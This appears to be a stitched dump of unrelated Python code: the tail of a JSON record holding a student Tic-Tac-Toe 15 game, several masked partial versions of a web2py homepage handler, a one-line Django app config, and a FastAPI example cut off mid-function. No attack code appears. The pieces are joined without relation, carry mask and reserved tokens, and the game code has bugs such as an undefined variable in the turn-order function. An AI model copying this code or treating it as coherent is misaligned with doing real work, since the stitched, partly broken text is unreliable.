play_game(p1_score, p2_score, name1, name2)\n",
"step-5": "# Name: Calvin Liew\r\n# Date: 2021-01-29\r\n# Purpose: Video game final project, Tic-Tac-Toe 15 by Calvin Liew.\r\n\r\nimport random\r\n\r\n\r\n# Function that reminds the users of the game rules and other instructions.\r\n\r\ndef intro():\r\n print(\"\"\"\\n####### ####### ####### # ####### \r\n # # #### # ## #### # #### ###### ## # \r\n # # # # # # # # # # # # # # # # \r\n # # # ##### # # # # ##### # # # ##### # ###### \r\n # # # # ###### # # # # # # # \r\n # # # # # # # # # # # # # # # # \r\n # # #### # # # #### # #### ###### ##### ##### \r\n\r\nHow to play Tic-Tac-Toe 15: \r\n\r\nTo win, you must get three numbers in a row/column/diagonal that add up to the sum of 15! The first player enters odd numbers and the second player enters even numbers. \r\n\r\nBoard Instructions: Tell the program the position of which you would like to enter by entering the number position of \r\nthe boxes as shown below. Players can can only enter from numbers from 1-9. \r\n\r\n | |\r\n\t 1 | 2 | 3\r\n\t_____|_____|_____\r\n\t | |\r\n\t 4 | 5 | 6\r\n\t_____|_____|_____\r\n\t | |\r\n\t 7 | 8 | 9\r\n\t | |\r\n \"\"\")\r\n\r\n\r\n# Function that prints the tic-tac-toe board.\r\n\r\ndef print_board(board):\r\n print(\"\\n\\t | |\")\r\n print(\"\\t {} | {} | {}\".format(board[0], board[1], board[2]))\r\n print('\\t_____|_____|_____')\r\n\r\n print(\"\\t | |\")\r\n print(\"\\t {} | {} | {}\".format(board[3], board[4], board[5]))\r\n print('\\t_____|_____|_____')\r\n\r\n print(\"\\t | |\")\r\n\r\n print(\"\\t {} | {} | {}\".format(board[6], board[7], board[8]))\r\n print(\"\\t | |\")\r\n\r\n\r\n# Function that chooses who goes first and assigns the player order.\r\n\r\ndef choose_who_first(player1, player2, player_order):\r\n flip = random.randint(1, 2)\r\n\r\n if flip == 1:\r\n print(\"\\n\" + player1, \"goes first.\", player1, \"can only play odd numbers and\", player2,\r\n \"can only play even numbers from 1-9. \")\r\n print()\r\n player_order.append(player1)\r\n player_order.append(player2)\r\n return player1\r\n\r\n elif flip == 2:\r\n print(\"\\n\" + player2, \"goes first.\", player2, \"can only play odd numbers and\", name1,\r\n \"can only play even numbers from 1-9. \")\r\n print()\r\n player_order.append(player2)\r\n player_order.append(player1)\r\n return player2\r\n\r\n\r\n# Function that calls the print_board() function as well as makes the moves that the players provide while checking if the moves are legal or not.\r\n\r\ndef make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order):\r\n odd_moves = [1, 3, 5, 7, 9]\r\n even_moves = [2, 4, 6, 8]\r\n\r\n try:\r\n if turn == player1:\r\n\r\n print(\"\\nIts your turn\", player1 + \": \")\r\n print()\r\n p1_move_input = int(input(\"Move to which space? (1-9): \"))\r\n\r\n if player_order[0] == player1:\r\n if 1 <= p1_move_input <= 9 and the_board[p1_move_input - 1] == 0:\r\n print()\r\n p1_num_input = int(input(\"Enter an ODD NUMBER from 1-9: \"))\r\n\r\n if p1_num_input in odd_moves and p1_num_input not in unavailable_moves_p1:\r\n the_board[p1_move_input - 1] = p1_num_input\r\n unavailable_moves_p1.append(p1_num_input)\r\n elif p1_num_input in unavailable_moves_p1:\r\n print(\"\\nINVALID INPUT, Please try again and enter a number that you haven't used. \")\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n else:\r\n print(\"\\nINVALID INPUT, Please try again and enter an ODD number. \")\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n elif p1_move_input < 1 or p1_move_input > 9:\r\n print(\"\\nINVALID INPUT, Please try again and enter a number between 1-9. \")\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n else:\r\n print(\"\\nINVALID INPUT, Please try again and enter an unoccupied spot. \")\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n\r\n elif player_order[1] == player1:\r\n if 1 <= p1_move_input <= 9 and the_board[p1_move_input - 1] == 0:\r\n print()\r\n p1_num_input = int(input(\"Enter a EVEN NUMBER from 1-9: \"))\r\n\r\n if p1_num_input in even_moves and p1_num_input not in unavailable_moves_p1:\r\n the_board[p1_move_input - 1] = p1_num_input\r\n unavailable_moves_p1.append(p1_num_input)\r\n elif p1_num_input in unavailable_moves_p1:\r\n print(\"\\nINVALID INPUT, Please try again and enter a number that you haven't used. \")\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n else:\r\n print(\"\\nINVALID INPUT, Please try again and enter a EVEN number. \")\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n elif p1_move_input < 1 or p1_move_input > 9:\r\n print(\"\\nINVALID INPUT, Please try again and enter a number between 1-9. \")\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n else:\r\n print(\"\\nINVALID INPUT, Please try again and enter an unoccupied spot. \")\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n\r\n if turn == player2:\r\n\r\n print(\"\\nIts your turn\", player2 + \": \")\r\n print()\r\n p2_move_input = int(input(\"Move to which space? (1-9): \"))\r\n\r\n if player_order[0] == player2:\r\n if 1 <= p2_move_input <= 9 and the_board[p2_move_input - 1] == 0:\r\n print()\r\n p2_num_input = int(input(\"Enter an ODD NUMBER from 1-9: \"))\r\n\r\n if p2_num_input in odd_moves and p2_num_input not in unavailable_moves_p2:\r\n the_board[p2_move_input - 1] = p2_num_input\r\n unavailable_moves_p2.append(p2_num_input)\r\n elif p2_num_input in unavailable_moves_p2:\r\n print(\"\\nINVALID INPUT, Please try again and enter a number that you haven't used. \")\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n else:\r\n print(\"\\nINVALID INPUT, Please try again and enter an ODD number. \")\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n elif p2_move_input < 1 or p2_move_input > 9:\r\n print(\"\\nINVALID INPUT, Please try again and enter a number between 1-9. \")\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n else:\r\n print(\"\\nINVALID INPUT, Please try again and enter an unoccupied spot. \")\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n\r\n elif player_order[1] == player2:\r\n if 1 <= p2_move_input <= 9 and the_board[p2_move_input - 1] == 0:\r\n print()\r\n p2_num_input = int(input(\"Enter a EVEN NUMBER from 1-9: \"))\r\n\r\n if p2_num_input in even_moves and p2_num_input not in unavailable_moves_p2:\r\n the_board[p2_move_input - 1] = p2_num_input\r\n unavailable_moves_p2.append(p2_num_input)\r\n elif p2_num_input in unavailable_moves_p2:\r\n print(\"\\nINVALID INPUT, Please try again and enter a number that you haven't used. \")\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n else:\r\n print(\"\\nINVALID INPUT, Please try again and enter a EVEN number. \")\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n elif p2_move_input < 1 or p2_move_input > 9:\r\n print(\"\\nINVALID INPUT, Please try again and enter a number between 1-9. \")\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n else:\r\n print(\"\\nINVALID, Please try again and enter an unoccupied spot. \")\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n\r\n except ValueError:\r\n print(\"\\nINVALID INPUT, Please try again and enter only in integers. \")\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n\r\n\r\n# Function that checks if any three numbers in a row/column/diagonal add up to 15. If there is, the function returns is_game_over and the game ends.\r\n\r\ndef check_game(board, winner):\r\n is_game_over = \"\"\r\n\r\n if board[0] + board[1] + board[2] == 15 and board[0] != 0 and board[1] != 0 and board[2] != 0:\r\n print_board(board)\r\n print(\"\\n\"+str(board[0])+\",\", str(board[1])+\",\", \"and\", str(board[2]), \"add up to 15! \")\r\n print(\"\\n\"+winner, \"wins! \")\r\n is_game_over = True\r\n elif board[3] + board[4] + board[5] == 15 and board[3] != 0 and board[4] != 0 and board[5] != 0:\r\n print_board(board)\r\n print(\"\\n\"+str(board[3])+\",\", str(board[4])+\",\", \"and\", str(board[5]), \"add up to 15! \")\r\n print(\"\\n\"+winner, \"wins! \")\r\n is_game_over = True\r\n elif board[6] + board[7] + board[8] == 15 and board[6] != 0 and board[7] != 0 and board[8] != 0:\r\n print_board(board)\r\n print(\"\\n\"+str(board[6])+\",\", str(board[7])+\",\", \"and\", str(board[8]), \"add up to 15! \")\r\n print(\"\\n\"+winner, \"wins! \")\r\n is_game_over = True\r\n elif board[0] + board[3] + board[6] == 15 and board[0] != 0 and board[3] != 0 and board[6] != 0:\r\n print_board(board)\r\n print(\"\\n\"+str(board[0])+\",\", str(board[3])+\",\", \"and\", str(board[6]), \"add up to 15! \")\r\n print(\"\\n\"+winner, \"wins! \")\r\n is_game_over = True\r\n elif board[1] + board[4] + board[7] == 15 and board[1] != 0 and board[4] != 0 and board[7] != 0:\r\n print_board(board)\r\n print(\"\\n\"+str(board[1])+\",\", str(board[4])+\",\", \"and\", str(board[7]), \"add up to 15! \")\r\n print(\"\\n\"+winner, \"wins! \")\r\n is_game_over = True\r\n elif board[2] + board[5] + board[8] == 15 and board[2] != 0 and board[5] != 0 and board[8] != 0:\r\n print_board(board)\r\n print(\"\\n\"+str(board[2])+\",\", str(board[5])+\",\", \"and\", str(board[8]), \"add up to 15! \")\r\n print(\"\\n\"+winner, \"wins! \")\r\n is_game_over = True\r\n elif board[6] + board[4] + board[2] == 15 and board[6] != 0 and board[4] != 0 and board[2] != 0:\r\n print_board(board)\r\n print(\"\\n\"+str(board[6])+\",\", str(board[4])+\",\", \"and\", str(board[2]), \"add up to 15! \")\r\n print(\"\\n\"+winner, \"wins! \")\r\n is_game_over = True\r\n elif board[0] + board[4] + board[8] == 15 and board[0] != 0 and board[4] != 0 and board[8] != 0:\r\n print_board(board)\r\n print(\"\\n\"+str(board[0])+\",\", str(board[4])+\",\", \"and\", str(board[8]), \"add up to 15! \")\r\n print(\"\\n\"+winner, \"wins! \")\r\n is_game_over = True\r\n\r\n return is_game_over\r\n\r\n\r\n# Function that prints the scoreboard and the scores of the two players. Prints after a round has ended.\r\n\r\ndef score(score1, score2, player1, player2):\r\n print(\"\\n\\t------------------\")\r\n print(\"\\t SCOREBOARD\")\r\n print(\"\\t------------------\")\r\n print(\"\\t\" + \" \" + player1 + \":\", score1)\r\n print(\"\\t\" + \" \" + player2 + \":\", score2)\r\n print(\"\\t------------------\")\r\n print()\r\n\r\n\r\n# Function that is where most of the game takes place. Function calls other functions such as make_move_and_update, choose_who_first, score and other code that make up the game.\r\n# Function keeps track of the player order, the board, unavailable moves, amount of rounds and other variables. The game ends in a draw when count reaches 9. At the end of the round, it asks the users if they want to play again.\r\n\r\ndef play_game(score1, score2, player1, player2):\r\n unavailable_moves_p1 = []\r\n unavailable_moves_p2 = []\r\n player_order = []\r\n the_board = [0, 0, 0, 0, 0, 0, 0, 0, 0]\r\n count = 0\r\n restart = \"\"\r\n\r\n turn = choose_who_first(player1, player2, player_order)\r\n\r\n input(\"Enter anything to start the round: \")\r\n\r\n for i in range(10):\r\n\r\n print_board(the_board)\r\n make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)\r\n count += 1\r\n\r\n if check_game(the_board, turn):\r\n if turn == player1:\r\n score1 += 1\r\n elif turn == player2:\r\n score2 += 1\r\n break\r\n\r\n if count == 9:\r\n print(\"No numbers added up to 15, it's a DRAW! \")\r\n break\r\n\r\n if turn == player1:\r\n turn = player2\r\n else:\r\n turn = player1\r\n\r\n input(\"\\nEnter anything to continue: \")\r\n score(score1, score2, player1, player2)\r\n\r\n# Asks if the players want to restart. If yes, it calls the play_game function. If no, it ends the game and congratulates the overall winner.\r\n\r\n while restart != \"yes\" or restart != \"y\" or restart != \"n\" or restart != \"no\":\r\n restart = input(\"Do want to play Again? (y/n) \").lower()\r\n if restart == \"y\" or restart == \"yes\":\r\n print(\"\\nLoading new round...\")\r\n play_game(score1, score2, player1, player2)\r\n elif restart == \"n\" or restart == \"no\":\r\n if score1 > score2:\r\n print(\"\\n\"+player1, \"is the overall winner! Congratulations!\")\r\n elif score2 > score1:\r\n print(\"\\n\"+player2, \"is the overall winner! Congratulations!\")\r\n elif score1 == score2:\r\n print(\"\\nBoth players have one the same amount of rounds. It's a draw! \")\r\n print(\"\\nThanks for playing! \")\r\n break\r\n else:\r\n print(\"\\nPlease enter YES or NO \")\r\n print()\r\n\r\n\r\n# This code manages the important things before the actual game starts such as the instructions, usernames, etc. Calls the play_game function.\r\n\r\nif __name__ == \"__main__\":\r\n intro()\r\n\r\n input(\"Enter anything to continue: \")\r\n\r\n print(\"\\nEnter usernames: \")\r\n name1 = input(\"\\nPlayer 1, Enter your name: \").title()\r\n name2 = input(\"\\nPlayer 2, Enter your name: \").title()\r\n\r\n p1_score = 0\r\n p2_score = 0\r\n play_game(p1_score, p2_score, name1, name2)\r\n",
"step-ids": [
6,
7,
8,
9,
10
]
}
|
[
6,
7,
8,
9,
10
] |
<|reserved_special_token_0|>
class Home(Base):
<|reserved_special_token_0|>
def pre_render(self):
self.response = self.db.response
self.request = self.db.request
self.config = self.db.config
self.response.meta.title = self.db.config.meta.title
self.response.meta.description = self.db.config.meta.description
self.response.meta.keywords = self.db.config.meta.keywords
self.context.use_facebook = self.db.config.auth.use_facebook
<|reserved_special_token_0|>
def ads(self):
self.context.ads = self.db(self.db.Ads.place == 'top_slider').select(
limitby=(0, 5), orderby='<random>')
if not self.context.ads:
from gluon.storage import Storage
self.context.ads = [Storage(id=1, thumbnail='', link=self.db.
CURL('contact', 'ads')), Storage(id=2, thumbnail=
'http://placehold.it/250x220&text=%s' % self.db.T(
'Your add here!'), link=self.db.CURL('contact', 'ads')),
Storage(id=3, thumbnail='http://placekitten.com/250/220',
link=self.db.CURL('contact', 'ads')), Storage(id=3,
thumbnail='http://placehold.it/250x220&text=%s' % self.db.T
('Your Logo'), link=self.db.CURL('contact', 'ads'))]
def featured(self):
self.context.featured = self.db(self.db.Article.featured == True
).select(limitby=(0, 4), orderby='<random>')
if not self.context.featured:
self.context.featured = self.db(self.db.Article).select(limitby
=(0, 4), orderby=~self.db.Article.likes)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Home(Base):
def start(self):
from movuca import DataBase, User
from datamodel.article import Article, ContentType, Category
from datamodel.ads import Ads
self.db = DataBase([User, ContentType, Category, Article, Ads])
def pre_render(self):
self.response = self.db.response
self.request = self.db.request
self.config = self.db.config
self.response.meta.title = self.db.config.meta.title
self.response.meta.description = self.db.config.meta.description
self.response.meta.keywords = self.db.config.meta.keywords
self.context.use_facebook = self.db.config.auth.use_facebook
<|reserved_special_token_0|>
def ads(self):
self.context.ads = self.db(self.db.Ads.place == 'top_slider').select(
limitby=(0, 5), orderby='<random>')
if not self.context.ads:
from gluon.storage import Storage
self.context.ads = [Storage(id=1, thumbnail='', link=self.db.
CURL('contact', 'ads')), Storage(id=2, thumbnail=
'http://placehold.it/250x220&text=%s' % self.db.T(
'Your add here!'), link=self.db.CURL('contact', 'ads')),
Storage(id=3, thumbnail='http://placekitten.com/250/220',
link=self.db.CURL('contact', 'ads')), Storage(id=3,
thumbnail='http://placehold.it/250x220&text=%s' % self.db.T
('Your Logo'), link=self.db.CURL('contact', 'ads'))]
def featured(self):
self.context.featured = self.db(self.db.Article.featured == True
).select(limitby=(0, 4), orderby='<random>')
if not self.context.featured:
self.context.featured = self.db(self.db.Article).select(limitby
=(0, 4), orderby=~self.db.Article.likes)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Home(Base):
def start(self):
from movuca import DataBase, User
from datamodel.article import Article, ContentType, Category
from datamodel.ads import Ads
self.db = DataBase([User, ContentType, Category, Article, Ads])
def pre_render(self):
self.response = self.db.response
self.request = self.db.request
self.config = self.db.config
self.response.meta.title = self.db.config.meta.title
self.response.meta.description = self.db.config.meta.description
self.response.meta.keywords = self.db.config.meta.keywords
self.context.use_facebook = self.db.config.auth.use_facebook
def last_articles(self):
from helpers.article import latest_articles
self.context.latest_articles = latest_articles(self.db)
def ads(self):
self.context.ads = self.db(self.db.Ads.place == 'top_slider').select(
limitby=(0, 5), orderby='<random>')
if not self.context.ads:
from gluon.storage import Storage
self.context.ads = [Storage(id=1, thumbnail='', link=self.db.
CURL('contact', 'ads')), Storage(id=2, thumbnail=
'http://placehold.it/250x220&text=%s' % self.db.T(
'Your add here!'), link=self.db.CURL('contact', 'ads')),
Storage(id=3, thumbnail='http://placekitten.com/250/220',
link=self.db.CURL('contact', 'ads')), Storage(id=3,
thumbnail='http://placehold.it/250x220&text=%s' % self.db.T
('Your Logo'), link=self.db.CURL('contact', 'ads'))]
def featured(self):
self.context.featured = self.db(self.db.Article.featured == True
).select(limitby=(0, 4), orderby='<random>')
if not self.context.featured:
self.context.featured = self.db(self.db.Article).select(limitby
=(0, 4), orderby=~self.db.Article.likes)
<|reserved_special_token_1|>
from handlers.base import Base
class Home(Base):
def start(self):
from movuca import DataBase, User
from datamodel.article import Article, ContentType, Category
from datamodel.ads import Ads
self.db = DataBase([User, ContentType, Category, Article, Ads])
def pre_render(self):
self.response = self.db.response
self.request = self.db.request
self.config = self.db.config
self.response.meta.title = self.db.config.meta.title
self.response.meta.description = self.db.config.meta.description
self.response.meta.keywords = self.db.config.meta.keywords
self.context.use_facebook = self.db.config.auth.use_facebook
def last_articles(self):
from helpers.article import latest_articles
self.context.latest_articles = latest_articles(self.db)
def ads(self):
self.context.ads = self.db(self.db.Ads.place == 'top_slider').select(
limitby=(0, 5), orderby='<random>')
if not self.context.ads:
from gluon.storage import Storage
self.context.ads = [Storage(id=1, thumbnail='', link=self.db.
CURL('contact', 'ads')), Storage(id=2, thumbnail=
'http://placehold.it/250x220&text=%s' % self.db.T(
'Your add here!'), link=self.db.CURL('contact', 'ads')),
Storage(id=3, thumbnail='http://placekitten.com/250/220',
link=self.db.CURL('contact', 'ads')), Storage(id=3,
thumbnail='http://placehold.it/250x220&text=%s' % self.db.T
('Your Logo'), link=self.db.CURL('contact', 'ads'))]
def featured(self):
self.context.featured = self.db(self.db.Article.featured == True
).select(limitby=(0, 4), orderby='<random>')
if not self.context.featured:
self.context.featured = self.db(self.db.Article).select(limitby
=(0, 4), orderby=~self.db.Article.likes)
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
from handlers.base import Base
class Home(Base):
def start(self):
from movuca import DataBase, User
from datamodel.article import Article, ContentType, Category
from datamodel.ads import Ads
self.db = DataBase([User, ContentType, Category, Article, Ads])
def pre_render(self):
# obrigatorio ter um config, um self.response|request, que tenha um render self.response.render
self.response = self.db.response
self.request = self.db.request
self.config = self.db.config
#self.view = "app/home.html"
self.response.meta.title = self.db.config.meta.title
self.response.meta.description = self.db.config.meta.description
self.response.meta.keywords = self.db.config.meta.keywords
self.context.use_facebook = self.db.config.auth.use_facebook
def last_articles(self):
from helpers.article import latest_articles
self.context.latest_articles = latest_articles(self.db)
def ads(self):
self.context.ads = self.db(self.db.Ads.place == "top_slider").select(limitby=(0, 5), orderby="<random>")
if not self.context.ads:
from gluon.storage import Storage
self.context.ads = [Storage(id=1, thumbnail='', link=self.db.CURL('contact', 'ads')),
Storage(id=2, thumbnail="http://placehold.it/250x220&text=%s" % self.db.T("Your add here!"), link=self.db.CURL('contact', 'ads')),
Storage(id=3, thumbnail="http://placekitten.com/250/220", link=self.db.CURL('contact', 'ads')),
Storage(id=3, thumbnail="http://placehold.it/250x220&text=%s" % self.db.T("Your Logo"), link=self.db.CURL('contact', 'ads'))
]
def featured(self):
self.context.featured = self.db(self.db.Article.featured == True).select(limitby=(0, 4), orderby="<random>")
if not self.context.featured:
self.context.featured = self.db(self.db.Article).select(limitby=(0, 4), orderby=~self.db.Article.likes)
|
flexible
|
{
"blob_id": "9d0d4707cc9a654752dd0b98fe0fec6a0c1419a1",
"index": 3029,
"step-1": "<mask token>\n\n\nclass Home(Base):\n <mask token>\n\n def pre_render(self):\n self.response = self.db.response\n self.request = self.db.request\n self.config = self.db.config\n self.response.meta.title = self.db.config.meta.title\n self.response.meta.description = self.db.config.meta.description\n self.response.meta.keywords = self.db.config.meta.keywords\n self.context.use_facebook = self.db.config.auth.use_facebook\n <mask token>\n\n def ads(self):\n self.context.ads = self.db(self.db.Ads.place == 'top_slider').select(\n limitby=(0, 5), orderby='<random>')\n if not self.context.ads:\n from gluon.storage import Storage\n self.context.ads = [Storage(id=1, thumbnail='', link=self.db.\n CURL('contact', 'ads')), Storage(id=2, thumbnail=\n 'http://placehold.it/250x220&text=%s' % self.db.T(\n 'Your add here!'), link=self.db.CURL('contact', 'ads')),\n Storage(id=3, thumbnail='http://placekitten.com/250/220',\n link=self.db.CURL('contact', 'ads')), Storage(id=3,\n thumbnail='http://placehold.it/250x220&text=%s' % self.db.T\n ('Your Logo'), link=self.db.CURL('contact', 'ads'))]\n\n def featured(self):\n self.context.featured = self.db(self.db.Article.featured == True\n ).select(limitby=(0, 4), orderby='<random>')\n if not self.context.featured:\n self.context.featured = self.db(self.db.Article).select(limitby\n =(0, 4), orderby=~self.db.Article.likes)\n",
"step-2": "<mask token>\n\n\nclass Home(Base):\n\n def start(self):\n from movuca import DataBase, User\n from datamodel.article import Article, ContentType, Category\n from datamodel.ads import Ads\n self.db = DataBase([User, ContentType, Category, Article, Ads])\n\n def pre_render(self):\n self.response = self.db.response\n self.request = self.db.request\n self.config = self.db.config\n self.response.meta.title = self.db.config.meta.title\n self.response.meta.description = self.db.config.meta.description\n self.response.meta.keywords = self.db.config.meta.keywords\n self.context.use_facebook = self.db.config.auth.use_facebook\n <mask token>\n\n def ads(self):\n self.context.ads = self.db(self.db.Ads.place == 'top_slider').select(\n limitby=(0, 5), orderby='<random>')\n if not self.context.ads:\n from gluon.storage import Storage\n self.context.ads = [Storage(id=1, thumbnail='', link=self.db.\n CURL('contact', 'ads')), Storage(id=2, thumbnail=\n 'http://placehold.it/250x220&text=%s' % self.db.T(\n 'Your add here!'), link=self.db.CURL('contact', 'ads')),\n Storage(id=3, thumbnail='http://placekitten.com/250/220',\n link=self.db.CURL('contact', 'ads')), Storage(id=3,\n thumbnail='http://placehold.it/250x220&text=%s' % self.db.T\n ('Your Logo'), link=self.db.CURL('contact', 'ads'))]\n\n def featured(self):\n self.context.featured = self.db(self.db.Article.featured == True\n ).select(limitby=(0, 4), orderby='<random>')\n if not self.context.featured:\n self.context.featured = self.db(self.db.Article).select(limitby\n =(0, 4), orderby=~self.db.Article.likes)\n",
"step-3": "<mask token>\n\n\nclass Home(Base):\n\n def start(self):\n from movuca import DataBase, User\n from datamodel.article import Article, ContentType, Category\n from datamodel.ads import Ads\n self.db = DataBase([User, ContentType, Category, Article, Ads])\n\n def pre_render(self):\n self.response = self.db.response\n self.request = self.db.request\n self.config = self.db.config\n self.response.meta.title = self.db.config.meta.title\n self.response.meta.description = self.db.config.meta.description\n self.response.meta.keywords = self.db.config.meta.keywords\n self.context.use_facebook = self.db.config.auth.use_facebook\n\n def last_articles(self):\n from helpers.article import latest_articles\n self.context.latest_articles = latest_articles(self.db)\n\n def ads(self):\n self.context.ads = self.db(self.db.Ads.place == 'top_slider').select(\n limitby=(0, 5), orderby='<random>')\n if not self.context.ads:\n from gluon.storage import Storage\n self.context.ads = [Storage(id=1, thumbnail='', link=self.db.\n CURL('contact', 'ads')), Storage(id=2, thumbnail=\n 'http://placehold.it/250x220&text=%s' % self.db.T(\n 'Your add here!'), link=self.db.CURL('contact', 'ads')),\n Storage(id=3, thumbnail='http://placekitten.com/250/220',\n link=self.db.CURL('contact', 'ads')), Storage(id=3,\n thumbnail='http://placehold.it/250x220&text=%s' % self.db.T\n ('Your Logo'), link=self.db.CURL('contact', 'ads'))]\n\n def featured(self):\n self.context.featured = self.db(self.db.Article.featured == True\n ).select(limitby=(0, 4), orderby='<random>')\n if not self.context.featured:\n self.context.featured = self.db(self.db.Article).select(limitby\n =(0, 4), orderby=~self.db.Article.likes)\n",
"step-4": "from handlers.base import Base\n\n\nclass Home(Base):\n\n def start(self):\n from movuca import DataBase, User\n from datamodel.article import Article, ContentType, Category\n from datamodel.ads import Ads\n self.db = DataBase([User, ContentType, Category, Article, Ads])\n\n def pre_render(self):\n self.response = self.db.response\n self.request = self.db.request\n self.config = self.db.config\n self.response.meta.title = self.db.config.meta.title\n self.response.meta.description = self.db.config.meta.description\n self.response.meta.keywords = self.db.config.meta.keywords\n self.context.use_facebook = self.db.config.auth.use_facebook\n\n def last_articles(self):\n from helpers.article import latest_articles\n self.context.latest_articles = latest_articles(self.db)\n\n def ads(self):\n self.context.ads = self.db(self.db.Ads.place == 'top_slider').select(\n limitby=(0, 5), orderby='<random>')\n if not self.context.ads:\n from gluon.storage import Storage\n self.context.ads = [Storage(id=1, thumbnail='', link=self.db.\n CURL('contact', 'ads')), Storage(id=2, thumbnail=\n 'http://placehold.it/250x220&text=%s' % self.db.T(\n 'Your add here!'), link=self.db.CURL('contact', 'ads')),\n Storage(id=3, thumbnail='http://placekitten.com/250/220',\n link=self.db.CURL('contact', 'ads')), Storage(id=3,\n thumbnail='http://placehold.it/250x220&text=%s' % self.db.T\n ('Your Logo'), link=self.db.CURL('contact', 'ads'))]\n\n def featured(self):\n self.context.featured = self.db(self.db.Article.featured == True\n ).select(limitby=(0, 4), orderby='<random>')\n if not self.context.featured:\n self.context.featured = self.db(self.db.Article).select(limitby\n =(0, 4), orderby=~self.db.Article.likes)\n",
"step-5": "# -*- coding: utf-8 -*-\n\nfrom handlers.base import Base\n\n\nclass Home(Base):\n def start(self):\n from movuca import DataBase, User\n from datamodel.article import Article, ContentType, Category\n from datamodel.ads import Ads\n self.db = DataBase([User, ContentType, Category, Article, Ads])\n\n def pre_render(self):\n # obrigatorio ter um config, um self.response|request, que tenha um render self.response.render\n self.response = self.db.response\n self.request = self.db.request\n self.config = self.db.config\n #self.view = \"app/home.html\"\n self.response.meta.title = self.db.config.meta.title\n self.response.meta.description = self.db.config.meta.description\n self.response.meta.keywords = self.db.config.meta.keywords\n self.context.use_facebook = self.db.config.auth.use_facebook\n\n def last_articles(self):\n from helpers.article import latest_articles\n self.context.latest_articles = latest_articles(self.db)\n\n def ads(self):\n self.context.ads = self.db(self.db.Ads.place == \"top_slider\").select(limitby=(0, 5), orderby=\"<random>\")\n if not self.context.ads:\n from gluon.storage import Storage\n self.context.ads = [Storage(id=1, thumbnail='', link=self.db.CURL('contact', 'ads')),\n Storage(id=2, thumbnail=\"http://placehold.it/250x220&text=%s\" % self.db.T(\"Your add here!\"), link=self.db.CURL('contact', 'ads')),\n Storage(id=3, thumbnail=\"http://placekitten.com/250/220\", link=self.db.CURL('contact', 'ads')),\n Storage(id=3, thumbnail=\"http://placehold.it/250x220&text=%s\" % self.db.T(\"Your Logo\"), link=self.db.CURL('contact', 'ads'))\n ]\n\n def featured(self):\n self.context.featured = self.db(self.db.Article.featured == True).select(limitby=(0, 4), orderby=\"<random>\")\n if not self.context.featured:\n self.context.featured = self.db(self.db.Article).select(limitby=(0, 4), orderby=~self.db.Article.likes)\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
from django.apps import AppConfig
class FosAppConfig(AppConfig):
name = 'fos_app'
|
normal
|
{
"blob_id": "d83f2d9bb25a46bc7344b420ce65bf729165e6b9",
"index": 278,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass FosAppConfig(AppConfig):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass FosAppConfig(AppConfig):\n name = 'fos_app'\n",
"step-4": "from django.apps import AppConfig\n\n\nclass FosAppConfig(AppConfig):\n name = 'fos_app'\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from fastapi import FastAPI, Header, Cookie, Form, Request, requests, Body, Response, HTTPException, status, Path, Query
from fastapi.responses import HTMLResponse
from typing import Optional
from fastapi.testclient import TestClient
from typing import List, Callable
from fastapi.staticfiles import StaticFiles
from fastapi.templating import Jinja2Templates
from fastapi.exceptions import RequestValidationError
from fastapi.routing import APIRoute
from starlette.responses import JSONResponse
from pydantic import BaseModel
import uvicorn
import time
payloads = {
'peoples': [
{
'firstname': 'watcharapon',
'lastname': 'weeraborirak',
'age': '24',
'city': 'bangkok'
},
{
'firstname': 'somsak',
'lastname': 'tamjai',
'age': '22',
'city': 'bangkok'
},
{
'firstname': 'rakkana',
'lastname': 'meejai',
'age': '66',
'city': 'outcast'
},
]
}
class Item(BaseModel):
name: str
price: float
class ValidationError(APIRoute):
def get_route_handler(self) -> Callable:
original_route_handler = super().get_route_handler()
async def customer_route_handler(request: Request) -> Response:
try:
return await original_route_handler(request)
except RequestValidationError as exc:
body = await request.body()
detail = {'error': exc.errors(), 'body': body.decode()}
raise HTTPException(status_code=200, detail=detail)
return customer_route_handler
app = FastAPI()
app.router.route_class = ValidationError
app.mount('/static', StaticFiles(directory='static'), name='static')
templates = Jinja2Templates(directory='templates')
client = TestClient(app)
@app.middleware('http')
async def add_process_time_header(request: Request, call_next):
start_time = time.time()
response = await call_next(request)
process_time = time.time() - start_time
